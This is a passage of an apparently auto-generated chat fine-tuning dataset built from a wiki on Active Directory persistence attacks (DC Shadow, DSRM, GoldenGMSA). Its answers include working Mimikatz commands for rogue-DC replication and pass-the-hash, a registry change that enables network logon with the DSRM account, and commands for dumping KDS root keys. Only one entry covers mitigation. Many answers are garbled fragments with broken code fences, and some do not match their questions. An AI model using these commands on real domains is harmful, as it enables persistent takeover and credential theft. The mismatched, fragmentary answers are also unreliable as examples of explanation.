DRSAddEntry)\n3. Push the changes by forcing another legitimate DC to replicate from the workstation with a DRSReplicaAdd call, which automatically makes a DRSGetNCChanges call from the legitimate DC to the shadow DC.\n4. Unregister the workstation so it is not longer considered to be a DC (by a DRSReplicaDel call and by reverting changes made to CN=Configuration and the workstation's SPN). \n\n![](<./assets/Adding entry to Configuration container.png>)\n\n
(step 1.1) add the entry to CN=Configuration
\n\n![](<./assets/Modifying the workstation SPN.png>)\n\n(step 1.2) modify the workstation's SPN{.caption}\n\n![](<./assets/DRSUAPI network capture.png>)\n\nAn example of DRSUAPI traffic for a successful DC Shadow attack{.caption}\n\nIt is important to note that this technique can be used as a \"meta\" one, in the sense th", "metadata": {"corpus_index": 1192, "category": "active_directory", "source_file": "docs/src/ad/persistence/dcshadow/index.md", "page_title": "DC Shadow", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about DC Shadow - Practice?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\n> [!CAUTION]\n> _July 27th 2023_ : There is currently no way to exploit this technique purely from a distant UNIX-like machine, as it requires some tools that have yet to be made.\n\n=== Windows\n\nDC Shadow can be performed by using Mimikatz. It works in every 64-bits Windows Server version up to 2022 (included). Everything happens on the workstation that will act as the shadow DC.\n\nTwo Mimikatz shells are required:\n\n* one with domain admin privileges (called the trigger shell from now on)\n* one as NT-AUTHORITY\\SYSTEM (called the RPC shell from now on)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about DC Shadow - Practice?", "response": "::: tabs\n\n=== UNIX-like\n\n> [!CAUTION]\n> _July 27th 2023_ : There is currently no way to exploit this technique purely from a distant UNIX-like machine, as it requires some tools that have yet to be made.\n\n=== Windows\n\nDC Shadow can be performed by using Mimikatz. It works in every 64-bits Windows Server version up to 2022 (included). Everything happens on the workstation that will act as the shadow DC.\n\nTwo Mimikatz shells are required:\n\n* one with domain admin privileges (called the trigger shell from now on)\n* one as NT-AUTHORITY\\SYSTEM (called the RPC shell from now on)", "metadata": {"corpus_index": 1193, "category": "active_directory", "source_file": "docs/src/ad/persistence/dcshadow/index.md", "page_title": "DC Shadow", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out DC Shadow - Practice during a pentest?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\n> [!CAUTION]\n> _July 27th 2023_ : There is currently no way to exploit this technique purely from a distant UNIX-like machine, as it requires some tools that have yet to be made.\n\n=== Windows\n\nDC Shadow can be performed by using Mimikatz. It works in every 64-bits Windows Server version up to 2022 (included). Everything happens on the workstation that will act as the shadow DC.\n\nTwo Mimikatz shells are required:\n\n* one with domain admin privileges (called the trigger shell from now on)\n* one as NT-AUTHORITY\\SYSTEM (called the RPC shell from now on)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out DC Shadow - Practice during a pentest?", "response": "::: tabs\n\n=== UNIX-like\n\n> [!CAUTION]\n> _July 27th 2023_ : There is currently no way to exploit this technique purely from a distant UNIX-like machine, as it requires some tools that have yet to be made.\n\n=== Windows\n\nDC Shadow can be performed by using Mimikatz. It works in every 64-bits Windows Server version up to 2022 (included). Everything happens on the workstation that will act as the shadow DC.\n\nTwo Mimikatz shells are required:\n\n* one with domain admin privileges (called the trigger shell from now on)\n* one as NT-AUTHORITY\\SYSTEM (called the RPC shell from now on)", "metadata": {"corpus_index": 1193, "category": "active_directory", "source_file": "docs/src/ad/persistence/dcshadow/index.md", "page_title": "DC Shadow", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe (RPC shell) in the context of penetration testing"}, {"role": "assistant", "content": "lsadump::dcshadow /object:ObjectToModify /attribute:AttributeToModifyOnTargetedObject /value:NewValueOfTargetedAttribute\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe (RPC shell) in the context of penetration testing", "response": "lsadump::dcshadow /object:ObjectToModify /attribute:AttributeToModifyOnTargetedObject /value:NewValueOfTargetedAttribute\n```", "metadata": {"corpus_index": 1194, "category": "active_directory", "source_file": "docs/src/ad/persistence/dcshadow/index.md", "page_title": "DC Shadow", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do (RPC shell)"}, {"role": "assistant", "content": "lsadump::dcshadow /object:ObjectToModify /attribute:AttributeToModifyOnTargetedObject /value:NewValueOfTargetedAttribute\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do (RPC shell)", "response": "lsadump::dcshadow /object:ObjectToModify /attribute:AttributeToModifyOnTargetedObject /value:NewValueOfTargetedAttribute\n```", "metadata": {"corpus_index": 1194, "category": "active_directory", "source_file": "docs/src/ad/persistence/dcshadow/index.md", "page_title": "DC Shadow", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe The command below will register the shadow DC, push the changes, and unregister in the context of penetration testing"}, {"role": "assistant", "content": "lsadump::dcshadow /push\n``\n\nSee the lsadump::dcshadow` at The Hacker Tools for more info.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe The command below will register the shadow DC, push the changes, and unregister in the context of penetration testing", "response": "lsadump::dcshadow /push\n``\n\nSee the lsadump::dcshadow` at The Hacker Tools for more info.\n\n:::", "metadata": {"corpus_index": 1195, "category": "active_directory", "source_file": "docs/src/ad/persistence/dcshadow/index.md", "page_title": "DC Shadow", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform The command below will register the shadow DC, push the changes, and unregister?"}, {"role": "assistant", "content": "lsadump::dcshadow /push\n``\n\nSee the lsadump::dcshadow` at The Hacker Tools for more info.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform The command below will register the shadow DC, push the changes, and unregister?", "response": "lsadump::dcshadow /push\n``\n\nSee the lsadump::dcshadow` at The Hacker Tools for more info.\n\n:::", "metadata": {"corpus_index": 1195, "category": "active_directory", "source_file": "docs/src/ad/persistence/dcshadow/index.md", "page_title": "DC Shadow", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about DSRM Persistence - Theory"}, {"role": "assistant", "content": "The Directory Services Restore Mode (DSRM) is a special mode available on every Domain Controller (DC) for recovery operations. When a server is promoted to a Domain Controller, a local administrator account named \"Administrator\" is created with a DSRM password. This password is rarely updated and is distinct from domain credentials, making it an interesting target for persistence.\n\nAn attacker with Domain Admin privileges (or local admin privileges on Domain Controllers) can retrieve the hash of the DSRM password using tools like Mimikatz and use it to maintain persistent access. By modifying specific configurations on the DC, it becomes possible to leverage the DSRM account remotely, including authenticating over the network.\n\nThe DSRM account, being a local administrator account on the DC, is not subject to domain password policies. However, by default, its use is limited to specific conditions, such as when the DC is booted into DSRM. These limitations can be bypassed by altering the registry key responsible for the account’s logon behavior.\n\nThe registry key HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior governs the conditions under which the DSRM account can be used:\n\n- Value 0 (default): The account is usable only when the DC is started in DSRM.\n- Value 1: Allows DSRM credentials when the local AD DS service is stopped.\n- Value 2: Permits the use of DSRM credentials at all times, including over the network.\n\nBy exploiting these configurations, an attacker can utilize the DSRM account for long-term access to the DC without requiring domain credentials."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about DSRM Persistence - Theory", "response": "The Directory Services Restore Mode (DSRM) is a special mode available on every Domain Controller (DC) for recovery operations. When a server is promoted to a Domain Controller, a local administrator account named \"Administrator\" is created with a DSRM password. This password is rarely updated and is distinct from domain credentials, making it an interesting target for persistence.\n\nAn attacker with Domain Admin privileges (or local admin privileges on Domain Controllers) can retrieve the hash of the DSRM password using tools like Mimikatz and use it to maintain persistent access. By modifying specific configurations on the DC, it becomes possible to leverage the DSRM account remotely, including authenticating over the network.\n\nThe DSRM account, being a local administrator account on the DC, is not subject to domain password policies. However, by default, its use is limited to specific conditions, such as when the DC is booted into DSRM. These limitations can be bypassed by altering the registry key responsible for the account’s logon behavior.\n\nThe registry key HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior governs the conditions under which the DSRM account can be used:\n\n- Value 0 (default): The account is usable only when the DC is started in DSRM.\n- Value 1: Allows DSRM credentials when the local AD DS service is stopped.\n- Value 2: Permits the use of DSRM credentials at all times, including over the network.\n\nBy exploiting these configurations, an attacker can utilize the DSRM account for long-term access to the DC without requiring domain credentials.", "metadata": {"corpus_index": 1196, "category": "credentials", "source_file": "docs/src/ad/persistence/dsrm.md", "page_title": "DSRM Persistence", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do DSRM Persistence - Theory"}, {"role": "assistant", "content": "The Directory Services Restore Mode (DSRM) is a special mode available on every Domain Controller (DC) for recovery operations. When a server is promoted to a Domain Controller, a local administrator account named \"Administrator\" is created with a DSRM password. This password is rarely updated and is distinct from domain credentials, making it an interesting target for persistence.\n\nAn attacker with Domain Admin privileges (or local admin privileges on Domain Controllers) can retrieve the hash of the DSRM password using tools like Mimikatz and use it to maintain persistent access. By modifying specific configurations on the DC, it becomes possible to leverage the DSRM account remotely, including authenticating over the network.\n\nThe DSRM account, being a local administrator account on the DC, is not subject to domain password policies. However, by default, its use is limited to specific conditions, such as when the DC is booted into DSRM. These limitations can be bypassed by altering the registry key responsible for the account’s logon behavior.\n\nThe registry key HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior governs the conditions under which the DSRM account can be used:\n\n- Value 0 (default): The account is usable only when the DC is started in DSRM.\n- Value 1: Allows DSRM credentials when the local AD DS service is stopped.\n- Value 2: Permits the use of DSRM credentials at all times, including over the network.\n\nBy exploiting these configurations, an attacker can utilize the DSRM account for long-term access to the DC without requiring domain credentials."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do DSRM Persistence - Theory", "response": "The Directory Services Restore Mode (DSRM) is a special mode available on every Domain Controller (DC) for recovery operations. When a server is promoted to a Domain Controller, a local administrator account named \"Administrator\" is created with a DSRM password. This password is rarely updated and is distinct from domain credentials, making it an interesting target for persistence.\n\nAn attacker with Domain Admin privileges (or local admin privileges on Domain Controllers) can retrieve the hash of the DSRM password using tools like Mimikatz and use it to maintain persistent access. By modifying specific configurations on the DC, it becomes possible to leverage the DSRM account remotely, including authenticating over the network.\n\nThe DSRM account, being a local administrator account on the DC, is not subject to domain password policies. However, by default, its use is limited to specific conditions, such as when the DC is booted into DSRM. These limitations can be bypassed by altering the registry key responsible for the account’s logon behavior.\n\nThe registry key HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior governs the conditions under which the DSRM account can be used:\n\n- Value 0 (default): The account is usable only when the DC is started in DSRM.\n- Value 1: Allows DSRM credentials when the local AD DS service is stopped.\n- Value 2: Permits the use of DSRM credentials at all times, including over the network.\n\nBy exploiting these configurations, an attacker can utilize the DSRM account for long-term access to the DC without requiring domain credentials.", "metadata": {"corpus_index": 1196, "category": "credentials", "source_file": "docs/src/ad/persistence/dsrm.md", "page_title": "DSRM Persistence", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of DSRM Persistence - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== Windows\n\nMimikatz can be used to perform the attack.\n\n```powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of DSRM Persistence - Practice", "response": "::: tabs\n\n=== Windows\n\nMimikatz can be used to perform the attack.\n\n```powershell", "metadata": {"corpus_index": 1197, "category": "credentials", "source_file": "docs/src/ad/persistence/dsrm.md", "page_title": "DSRM Persistence", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform DSRM Persistence - Practice?"}, {"role": "assistant", "content": "::: tabs\n\n=== Windows\n\nMimikatz can be used to perform the attack.\n\n```powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform DSRM Persistence - Practice?", "response": "::: tabs\n\n=== Windows\n\nMimikatz can be used to perform the attack.\n\n```powershell", "metadata": {"corpus_index": 1197, "category": "credentials", "source_file": "docs/src/ad/persistence/dsrm.md", "page_title": "DSRM Persistence", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Set the registry key to allow login with the DSRM account in the context of penetration testing"}, {"role": "assistant", "content": "New-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Control\\Lsa\" -Name \"DsrmAdminLogonBehavior\" -Value 2 -PropertyType DWORD"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Set the registry key to allow login with the DSRM account in the context of penetration testing", "response": "New-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Control\\Lsa\" -Name \"DsrmAdminLogonBehavior\" -Value 2 -PropertyType DWORD", "metadata": {"corpus_index": 1198, "category": "credentials", "source_file": "docs/src/ad/persistence/dsrm.md", "page_title": "DSRM Persistence", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Set the registry key to allow login with the DSRM account?"}, {"role": "assistant", "content": "New-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Control\\Lsa\" -Name \"DsrmAdminLogonBehavior\" -Value 2 -PropertyType DWORD"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Set the registry key to allow login with the DSRM account?", "response": "New-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Control\\Lsa\" -Name \"DsrmAdminLogonBehavior\" -Value 2 -PropertyType DWORD", "metadata": {"corpus_index": 1198, "category": "credentials", "source_file": "docs/src/ad/persistence/dsrm.md", "page_title": "DSRM Persistence", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Use the hash to authenticate and run a new PowerShell process?"}, {"role": "assistant", "content": "mimikatz.exe \"sekurlsa::pth /domain: /user:Administrator /ntlm: /run:powershell.exe\"\n```\n\n=== 🛠️ UNIX-like\n\n// TODO\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Use the hash to authenticate and run a new PowerShell process?", "response": "mimikatz.exe \"sekurlsa::pth /domain: /user:Administrator /ntlm: /run:powershell.exe\"\n```\n\n=== 🛠️ UNIX-like\n\n// TODO\n\n:::", "metadata": {"corpus_index": 1199, "category": "credentials", "source_file": "docs/src/ad/persistence/dsrm.md", "page_title": "DSRM Persistence", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Use the hash to authenticate and run a new PowerShell process"}, {"role": "assistant", "content": "mimikatz.exe \"sekurlsa::pth /domain: /user:Administrator /ntlm: /run:powershell.exe\"\n```\n\n=== 🛠️ UNIX-like\n\n// TODO\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Use the hash to authenticate and run a new PowerShell process", "response": "mimikatz.exe \"sekurlsa::pth /domain: /user:Administrator /ntlm: /run:powershell.exe\"\n```\n\n=== 🛠️ UNIX-like\n\n// TODO\n\n:::", "metadata": {"corpus_index": 1199, "category": "credentials", "source_file": "docs/src/ad/persistence/dsrm.md", "page_title": "DSRM Persistence", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is DSRM Persistence - Mitigation?"}, {"role": "assistant", "content": "Monitor registry changes to HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior and alert on values 1 or 2 (Event ID 4794)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is DSRM Persistence - Mitigation?", "response": "Monitor registry changes to HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior and alert on values 1 or 2 (Event ID 4794).", "metadata": {"corpus_index": 1200, "category": "credentials", "source_file": "docs/src/ad/persistence/dsrm.md", "page_title": "DSRM Persistence", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on DSRM Persistence - Mitigation"}, {"role": "assistant", "content": "Monitor registry changes to HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior and alert on values 1 or 2 (Event ID 4794)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on DSRM Persistence - Mitigation", "response": "Monitor registry changes to HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior and alert on values 1 or 2 (Event ID 4794).", "metadata": {"corpus_index": 1200, "category": "credentials", "source_file": "docs/src/ad/persistence/dsrm.md", "page_title": "DSRM Persistence", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does GoldenGMSA - What is a gMSA account? work?"}, {"role": "assistant", "content": "Within an Active Directory environment, service accounts are often created and used by different applications. These accounts usually have a password that is rarely updated. To address this issue, it is possible to create Group Managed Service Accounts (gMSA), which are managed directly by AD, with a strong password and a regular password rotation.\n\nThe password of a gMSA account can legitimately be requested by authorized applications. In that case, an LDAP request is made to the domain controller, asking for the gMSA account's msDS-ManagedPassword attribute's value.\n\n> [!TIP]\n> A gMSA account's msDS-ManagedPassword attribute doesn't actually store the password (it's a constructed attribute). Everytime that attribute is requested by an authorized principal, the domain controller computes it and returns the result. The calculation is detailed a bit more in the password calculation part of this recipe, but simply said, it relies on a static master key (i.e. one of the KDS root keys) and some additional data relative to the gMSA account.\n\nThe \"GoldenGMSA\" persistence lies in the fact that the KDS root keys used for gMSA password calculation don't change (at least not without some admin intervention or custom automation). Once they are exfiltrated and saved, any gMSA account password can be calculated since the additional values needed can be obtained by any low-privileged user."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does GoldenGMSA - What is a gMSA account? work?", "response": "Within an Active Directory environment, service accounts are often created and used by different applications. These accounts usually have a password that is rarely updated. To address this issue, it is possible to create Group Managed Service Accounts (gMSA), which are managed directly by AD, with a strong password and a regular password rotation.\n\nThe password of a gMSA account can legitimately be requested by authorized applications. In that case, an LDAP request is made to the domain controller, asking for the gMSA account's msDS-ManagedPassword attribute's value.\n\n> [!TIP]\n> A gMSA account's msDS-ManagedPassword attribute doesn't actually store the password (it's a constructed attribute). Everytime that attribute is requested by an authorized principal, the domain controller computes it and returns the result. The calculation is detailed a bit more in the password calculation part of this recipe, but simply said, it relies on a static master key (i.e. one of the KDS root keys) and some additional data relative to the gMSA account.\n\nThe \"GoldenGMSA\" persistence lies in the fact that the KDS root keys used for gMSA password calculation don't change (at least not without some admin intervention or custom automation). Once they are exfiltrated and saved, any gMSA account password can be calculated since the additional values needed can be obtained by any low-privileged user.", "metadata": {"corpus_index": 1201, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through GoldenGMSA - What is a gMSA account?"}, {"role": "assistant", "content": "Within an Active Directory environment, service accounts are often created and used by different applications. These accounts usually have a password that is rarely updated. To address this issue, it is possible to create Group Managed Service Accounts (gMSA), which are managed directly by AD, with a strong password and a regular password rotation.\n\nThe password of a gMSA account can legitimately be requested by authorized applications. In that case, an LDAP request is made to the domain controller, asking for the gMSA account's msDS-ManagedPassword attribute's value.\n\n> [!TIP]\n> A gMSA account's msDS-ManagedPassword attribute doesn't actually store the password (it's a constructed attribute). Everytime that attribute is requested by an authorized principal, the domain controller computes it and returns the result. The calculation is detailed a bit more in the password calculation part of this recipe, but simply said, it relies on a static master key (i.e. one of the KDS root keys) and some additional data relative to the gMSA account.\n\nThe \"GoldenGMSA\" persistence lies in the fact that the KDS root keys used for gMSA password calculation don't change (at least not without some admin intervention or custom automation). Once they are exfiltrated and saved, any gMSA account password can be calculated since the additional values needed can be obtained by any low-privileged user."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through GoldenGMSA - What is a gMSA account?", "response": "Within an Active Directory environment, service accounts are often created and used by different applications. These accounts usually have a password that is rarely updated. To address this issue, it is possible to create Group Managed Service Accounts (gMSA), which are managed directly by AD, with a strong password and a regular password rotation.\n\nThe password of a gMSA account can legitimately be requested by authorized applications. In that case, an LDAP request is made to the domain controller, asking for the gMSA account's msDS-ManagedPassword attribute's value.\n\n> [!TIP]\n> A gMSA account's msDS-ManagedPassword attribute doesn't actually store the password (it's a constructed attribute). Everytime that attribute is requested by an authorized principal, the domain controller computes it and returns the result. The calculation is detailed a bit more in the password calculation part of this recipe, but simply said, it relies on a static master key (i.e. one of the KDS root keys) and some additional data relative to the gMSA account.\n\nThe \"GoldenGMSA\" persistence lies in the fact that the KDS root keys used for gMSA password calculation don't change (at least not without some admin intervention or custom automation). Once they are exfiltrated and saved, any gMSA account password can be calculated since the additional values needed can be obtained by any low-privileged user.", "metadata": {"corpus_index": 1201, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about GoldenGMSA - Obtaining persistence?"}, {"role": "assistant", "content": "Once an AD environment is compromised, acquiring the \"GoldenGMSA\" persistence requires to dump the KDS root keys.\n\n::: tabs\n\n=== Windows\n\nThe KDS (Key Distribution Service) root keys can be exfiltrated from the domain with high-privileged access with GoldenGMSA (C#).\n\nWithout the --forest argument, the forest root domain is queried, hence requiring Enterprise Admins or Domain Admins privileges in the forest root domain, or SYSTEM privileges on a forest root Domain Controller.\n\n``powershell\nGoldenGMSA.exe kdsinfo\n`\n\nWith the --forest argument specifying the target domain or forest, SYSTEM privileges are required on the corresponding domain or forest Domain Controller. In case a child domain is specified, the parent domain keys will be dumped as well.\n\n`powershell\nGoldenGMSA.exe kdsinfo --forest child.lab.local\n`\n\n=== UNIX-like\n\npyGoldenGMSA (Python) implements the cryptographic pipeline in Python, enabling KDS root key extraction and gMSA password computation from Linux-based platforms without Windows-specific dependencies.\n\nKDS root keys can be exfiltrated with high-privileged access. Multiple authentication methods are supported:\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about GoldenGMSA - Obtaining persistence?", "response": "Once an AD environment is compromised, acquiring the \"GoldenGMSA\" persistence requires to dump the KDS root keys.\n\n::: tabs\n\n=== Windows\n\nThe KDS (Key Distribution Service) root keys can be exfiltrated from the domain with high-privileged access with GoldenGMSA (C#).\n\nWithout the --forest argument, the forest root domain is queried, hence requiring Enterprise Admins or Domain Admins privileges in the forest root domain, or SYSTEM privileges on a forest root Domain Controller.\n\n``powershell\nGoldenGMSA.exe kdsinfo\n`\n\nWith the --forest argument specifying the target domain or forest, SYSTEM privileges are required on the corresponding domain or forest Domain Controller. In case a child domain is specified, the parent domain keys will be dumped as well.\n\n`powershell\nGoldenGMSA.exe kdsinfo --forest child.lab.local\n`\n\n=== UNIX-like\n\npyGoldenGMSA (Python) implements the cryptographic pipeline in Python, enabling KDS root key extraction and gMSA password computation from Linux-based platforms without Windows-specific dependencies.\n\nKDS root keys can be exfiltrated with high-privileged access. Multiple authentication methods are supported:\n\n``bash", "metadata": {"corpus_index": 1202, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform GoldenGMSA - Obtaining persistence?"}, {"role": "assistant", "content": "Once an AD environment is compromised, acquiring the \"GoldenGMSA\" persistence requires to dump the KDS root keys.\n\n::: tabs\n\n=== Windows\n\nThe KDS (Key Distribution Service) root keys can be exfiltrated from the domain with high-privileged access with GoldenGMSA (C#).\n\nWithout the --forest argument, the forest root domain is queried, hence requiring Enterprise Admins or Domain Admins privileges in the forest root domain, or SYSTEM privileges on a forest root Domain Controller.\n\n``powershell\nGoldenGMSA.exe kdsinfo\n`\n\nWith the --forest argument specifying the target domain or forest, SYSTEM privileges are required on the corresponding domain or forest Domain Controller. In case a child domain is specified, the parent domain keys will be dumped as well.\n\n`powershell\nGoldenGMSA.exe kdsinfo --forest child.lab.local\n`\n\n=== UNIX-like\n\npyGoldenGMSA (Python) implements the cryptographic pipeline in Python, enabling KDS 